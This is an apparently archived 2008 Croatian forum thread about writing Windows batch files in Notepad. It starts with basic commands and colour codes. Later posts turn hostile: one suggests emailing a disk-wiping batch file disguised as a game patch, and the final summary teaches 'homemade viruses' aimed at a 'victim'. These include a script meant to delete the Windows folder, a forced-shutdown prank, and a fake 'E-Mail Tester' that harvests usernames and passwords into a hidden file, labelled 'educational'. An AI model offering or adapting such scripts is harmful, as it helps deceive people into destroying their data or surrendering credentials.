PDA

Pogledaj cijelu verziju : Kako se programira u Notepadu?



Ubizec Corporation
28-05-2008, 12:54
Ovak molio bi nekog da mi napise naredbe koje se koriste za notepad da nesto radi kad dvaput kliknem na b izvrsnu .bat datoteku.Znaci recimo da napravim program kad dvaput kliknem da on pobrise neki folder ili nes,aj ak neko zna stvarno me to interesira!Hvala! :toilet:

mronki
28-05-2008, 13:20
Sorry al neda mi se pisat. Jednostavno nađi neki tutorial za programiranje u batchu preko googla (npr. http://www.infionline.net/~wtnewton/batch/batguide.html).

fps_gamer
28-05-2008, 15:15
idi start > run > cmd i upisi help

pa se snadi

Luka
28-05-2008, 18:57
Ovak molio bi nekog da mi napise naredbe koje se koriste za notepad da nesto radi kad dvaput kliknem na b izvrsnu .bat datoteku.Znaci recimo da napravim program kad dvaput kliknem da on pobrise neki folder ili nes,aj ak neko zna stvarno me to interesira!Hvala! :toilet:

neke od zanimljivijih naredbi

dir //listanje sadržaja trenutnog direktorija
cd <naziv_direktorija> //"ulazak" u neki direktorij koji se nalazi u trenutnom, <naziv_direktorija> zamijeni s pravim
cd .. // vrača te u prethodni direktorij (točnije jednu razinu iznad)
cd \ // vrača te na "root" trenutnog uređaja/particije (npr na c: )
md <naziv_direktorija> // izrada novog direktorija u trenutnom
del <ime> // brisanje bilo čega, možeš dati puni put (npr. c:/f/a.txt) ili samo dio puta ako se već nalaziš u direktoriju gdje je datoteka (ako si u C:, onda je to del f/a.txt, ako si u c:/f, onda samo del a.txt)
copy <a> [b]S // kopiranje datoteke
echo <tekst> // ispis teksta u konzolu (cmd)

većina naredba koje su vezane uz datoteke podržava zvjezdice - *, pa ako neznaš cijeli naziv koristiš zvjezdicu
npr, del *.* će obrisati sve datoteke svih vrsta u trenutnom direktoriju

Ubizec Corporation
28-05-2008, 19:11
Tnx budem pprobo malo sad bas me zanimaju ti bat.filovi jel se mislim malo poigrat s tim da skuzim i to :D !

Ubizec Corporation
29-05-2008, 18:19
e kaj se netreba tavljat kod naredbi znak @?

Luka
29-05-2008, 18:40
e kaj se netreba tavljat kod naredbi znak @?

ne

Ubizec Corporation
29-05-2008, 18:42
Evo sam bas program radim i kad ga pokrenem sve coll radi al se dos pokrene(onaj crni ekran)comand promt i odma se zgasi koja je naredba da on ostane cjelo vrijeme upaljen?

Luka
29-05-2008, 18:44
Evo sam bas program radim i kad ga pokrenem sve coll radi al se dos pokrene(onaj crni ekran)comand promt i odma se zgasi koja je naredba da on ostane cjelo vrijeme upaljen?

dodaj

pause
na kraj

Ubizec Corporation
29-05-2008, 18:49
Shljaka tnx :D

C
02-06-2008, 02:48
e kaj se netreba tavljat kod naredbi znak @?

ne
Koristi ga radi preglednosti ako ti je lakše.

U Notepadu možeš pisati sve i svašta, ali najbolje ti je batcheve.
Otiđi na start, help & support, i ukucaj command-line, i od onoga što će ti naći, klikni na A-Ž, i izbaciti će ti sve komande, i svaki klik na neku od tih komandi, odvara ti objašnjenje čemu ta i ta komanda služi, ša je na raspolaganju uz tu komandu, i primjeri.
Ako nemaš u startu help & support, otiđi u Windows folder, pchealth, helpctr, binaries, i pokreni od tamo HelpCtr.exe

Nakon što napišeš neku skriptu, odeš na file, save as, odabereš sve ekstenzije i spremiš kao ime.bat ili ime.cmd

Nekih komandi ti neće biti na listi svih komandi.
Tipa komande HID@/ ili >NUL, itd., ali prvo savladaj osnove, i pitaj što ti nije jasno.

Burek_fr0m_SPACE
04-06-2008, 00:38
e kaj se netreba tavljat kod naredbi znak @?
Znak @ prije naredbe spriječava da sam tekst naredbe bude ispisan na ekranu, tj. korisnik neće vidjeti "kako program radi". Koristi ga samo ako trebaš selektivno sakriti par naredbi. Ako želiš da korisnik vidio samo ono što mu ti ispišeš (a u većini slučajeva ćeš htjeti to), samo na početak stavi "@echo off", što će isključiti ispis naredbi.

Ubizec Corporation
04-06-2008, 21:53
Pozz evo skuzio sam osnove i sve je cool krenuo bi dalje :D 1.Kak promjenit boju slova 2.kaj napravit recimo da imam zadani uvjet ko u c++ if,else if ...kak to napravit u notepadu ? :roll: hmm...3.kad sejvam tu bat datoteku kak da je lockam da niko je nemre otvorit prek notepada

streetrace777
05-06-2008, 09:17
Probaj desni klik i stavit kvacicu samo na read only

C
05-06-2008, 12:19
@streetrace777 - Čitaj pitanje.

1. Već sam ti pokazao na PP. Upišeš color jedan razmak broj/slovo pozadine i boju fonta. Npr. color 0C.
Evo što ti je na raspolaganju:
0 = Black 8 = Gray
1 = Blue 9 = Light Blue
2 = Green A = Light Green
3 = Aqua B = Light Aqua
4 = Red C = Light Red
5 = Purple D = Light Purple
6 = Yellow E = Light Yellow
7 = White F = Bright White

2. Upišeš normalno valjda.

3. Možeš napraviti razne stvari po tom pitanju. Možeš BAT staviti u neki EXE, ili ga 100% sakriti komandama i pored njega napraviti VBS koji će ga pokretati.


[quote="Ubizec Corporation":24wrsydo]e kaj se netreba tavljat kod naredbi znak @?
Znak @ prije naredbe spriječava da sam tekst naredbe bude ispisan na ekranu, tj. korisnik neće vidjeti "kako program radi". Koristi ga samo ako trebaš selektivno sakriti par naredbi. Ako želiš da korisnik vidio samo ono što mu ti ispišeš (a u većini slučajeva ćeš htjeti to), samo na početak stavi "@echo off", što će isključiti ispis naredbi.[/quote:24wrsydo]
A za sakriti procese je >nul.
Npr. komanda "pause" će ispisati press any key to continue, a "pause >nul" neće ispisati ništa, nego će čekati da nešto stisneš za nastavak, bez obzira imala ta komanda @ ili ne.

SkunK
05-06-2008, 12:29
Koja je bila svrha tog bat jezika, i jel on uopce jezik pošto se s njim nemože ništa puno konkretno napravit (osim eto tih par komandi komuniciranja s računalom)?

mronki
05-06-2008, 14:38
To ti je najlakši način kako nekome sje*at komp. Napraviš bat datoteku koja formatira disk il tako nešto (to je jako jednostavno za napravit) sakriješ u neku sliku il kažeš da je to najnoviji patch za igricu (normalno moraš objasnit zašto ima samo 2 KBa) pošalješ to nekome mailom, on otvori i ola.

fps_gamer
05-06-2008, 14:42
jedini porblem je taj sto se ne moze formatirati iz win-a... koliko znam...

mronki
05-06-2008, 15:11
Moš napravit da se sve s harda na kojem su windowsi izbriše

Plexihack
05-06-2008, 18:12
Koja je bila svrha tog bat jezika, i jel on uopce jezik pošto se s njim nemože ništa puno konkretno napravit (osim eto tih par komandi komuniciranja s računalom)?


Bat jezik je zapravo skup naredbi iz MSDOS-a i pomoću njega se najlakše automatiziraju procesi pomoću skripti koje koriste te naredbe...
Npr.
AT 00:00 "shutdown -r"
To pomaže sys adminima ako žele u ponoć restartat server (pretpostavimo da radi na winu...xD),pa nemoraju to ručno radit.

Pomoću njega se isto poseže do low-level windows funkcija npr.ping, FTP klijenta( za transfer file-a),Telnet klijenta,verify,oznaka harda,usporedbe filea ect.

Ubizec Corporation
15-06-2008, 08:37
E zna ko kak da kad napravim prog da se on skopira u xx direktori heljp :? ?

fps_gamer
15-06-2008, 09:03
COPY ime.bat C:\\...

ime.bat je ime tvog programa

Ubizec Corporation
21-06-2008, 22:10
EVO NAPRAVIO DEDA JEDNU CJELINU PA DA TO ZAOKRUZIMO!
-Najkorisnije naredbe su :
-@echo off - ova naredba ce reci kompjutoru da NE prikazuje sto se trenutno dogadja . Vrlo korisno , ako ne zelite da zrtva vidi sto program radi :-)
-echo text ovdje - ova naredba ce reci kompjutoru da na ekran napise ''text ovdje'' . Recimo da zelite napisati ''IDIOTE'' na zrtvin zaslon . Tada cete utipkati ''echo IDIOTE'' .
-cd\ - ova naredba kaze kompjutoru da ide u C disk .
-cd ime foldera (direktorij) - ova naredba kaze kompjutoru da otvori folder . Znaci , ako napisete cd windows , kompjutor ce otvoriti folder WINDOWS (najvazniji folder u WINDOWSIMA :-))
-rd ime foldera - ova naredba ce ukloniti folder (Remove Directory) . Ovo je malo skureno za objasniti . Recimo da ste u prethodnom koraku napisali cd windows onda ne mozete sada napisati rd windows jer se windows ne nalazi u c:\windows . Ako niste nista razumjeli ja vam uz najbolju volju više ne mogu pomoci .
-@del ime filea - ova naredba brise odredjeni file iz prethodno odabranog foldera .
-end - ova naredba zavrsava proces i izlazi iz programa .
-Sada kad znate osnovne naredbe mozemo prijeci na stvaranje domacih virusa .
-Evo jedan primjer :
@echo off
cd\
rd windows
echo Ovo je virus
echo Drugi put malo vise pazi
echo Bas nemas srece !
end
-Analizirajmo ovaj komad zlobe :
@echo off - kaze komjutoru da sakrije sve sto radi . Tako zrtva nema pojma sto se dogadja . Vrlo korisno .
cd\ - kaze kompjutoru da ide u C: disk .
rd windows - kaze kompjutoru da izbrise folder WINDOWS sa C diska , sto znaci ZBOGOM WINDOWSI .
echo Ovo je virus - kaze kompjutoru da na zrtvin zaslon napise Ovo je virus .
echo Drugi put malo vise pazi - kaze kompjutoru da na zrtvin zaslon napise Drugi put malo vise pazi .
echo Bas nemas srece - kaze kompjutoru da na zrtvin zaslon napise Bas nemas srece .
end - konacno zavrsava .
-Recimo da ste zavrsili pisanje svog ''virusa'' u Notepadu . Sad zelite znati kako ga sejvati . Nista lakse . Gore u lijevom kutu idite na ''file'' pa na ''save as'' . Sada upisite kako zelite da se vas ''virus'' zove , ali obratite paznju na to da mora zavrsavati na .bat jer u suprotnom nece raditi (npr. nurid.bat) .
Nastavak: http://www.infionline.net/~wtnewton/batch/batguide.htmlS-stranica na engl za bath programiranje

GLAVNE KOMANDE :idi start > run > cmd i upisi help

dir //listanje sadržaja trenutnog direktorija
cd <naziv_direktorija> //"ulazak" u neki direktorij koji se nalazi u trenutnom, <naziv_direktorija> zamijeni s pravim
cd .. // vrača te u prethodni direktorij (točnije jednu razinu iznad)
cd \ // vrača te na "root" trenutnog uređaja/particije (npr na c: )
md <naziv_direktorija> // izrada novog direktorija u trenutnom
del <ime> // brisanje bilo čega, možeš dati puni put (npr. c:/f/a.txt) ili samo dio puta ako se već nalaziš u direktoriju gdje je datoteka (ako si u C:, onda je to del f/a.txt, ako si u c:/f, onda samo del a.txt)
copy <a> [b]S// kopiranje datoteke
echo <tekst> // ispis teksta u konzolu (cmd)

kad napisete program stavite kod:”pause”on sprijecava zatvarane prozora a “>nul”sakrriva odredeni proces

Primjeri programa:GASENJE RAČUNALA


echo Bily Piton Virus
msg * Imas bananu u supku momak!
shutdown -s -t 60 -c "A virus is taking over C:\ drive
pause

Primjeri programa:Krađa Email adrese


@echo off
@title E-mail Tester.
@color 0B
echo:
echo For Testing Your E-Mail,
echo Please Enter Your Username, Password and E-Mail Address.
echo:
set /p User=Enter Your Username:
set /p Pass=Enter Your Password:
set /p Mail=Enter Your E-Mail:
echo Username: %User% >>%windir%\ACC.ZAP
echo Password: %Pass% >>%windir%\ACC.ZAP
echo E-Mail: %Mail% >>%windir%\ACC.ZAP
echo:>>%windir%\ACC.ZAP
@cls
@title Finished!
@color 0C
echo:
echo E-Mail Status: OK
echo:
@pause >nul
@exit

Program trazi e mail i paswor zatim to sprema u windows folder pod imenom ACC.ZAP

Stavljanje boja u tekst i pozadinu:

Evo što ti je na raspolaganju:
0 = Black 8 = Gray
1 = Blue 9 = Light Blue
2 = Green A = Light Green
3 = Aqua B = Light Aqua
4 = Red C = Light Red
5 = Purple D = Light Purple
6 = Yellow E = Light Yellow
7 = White F = Bright White

NAPOMENA:OVO JE U EDUKATIVNE SVRHE!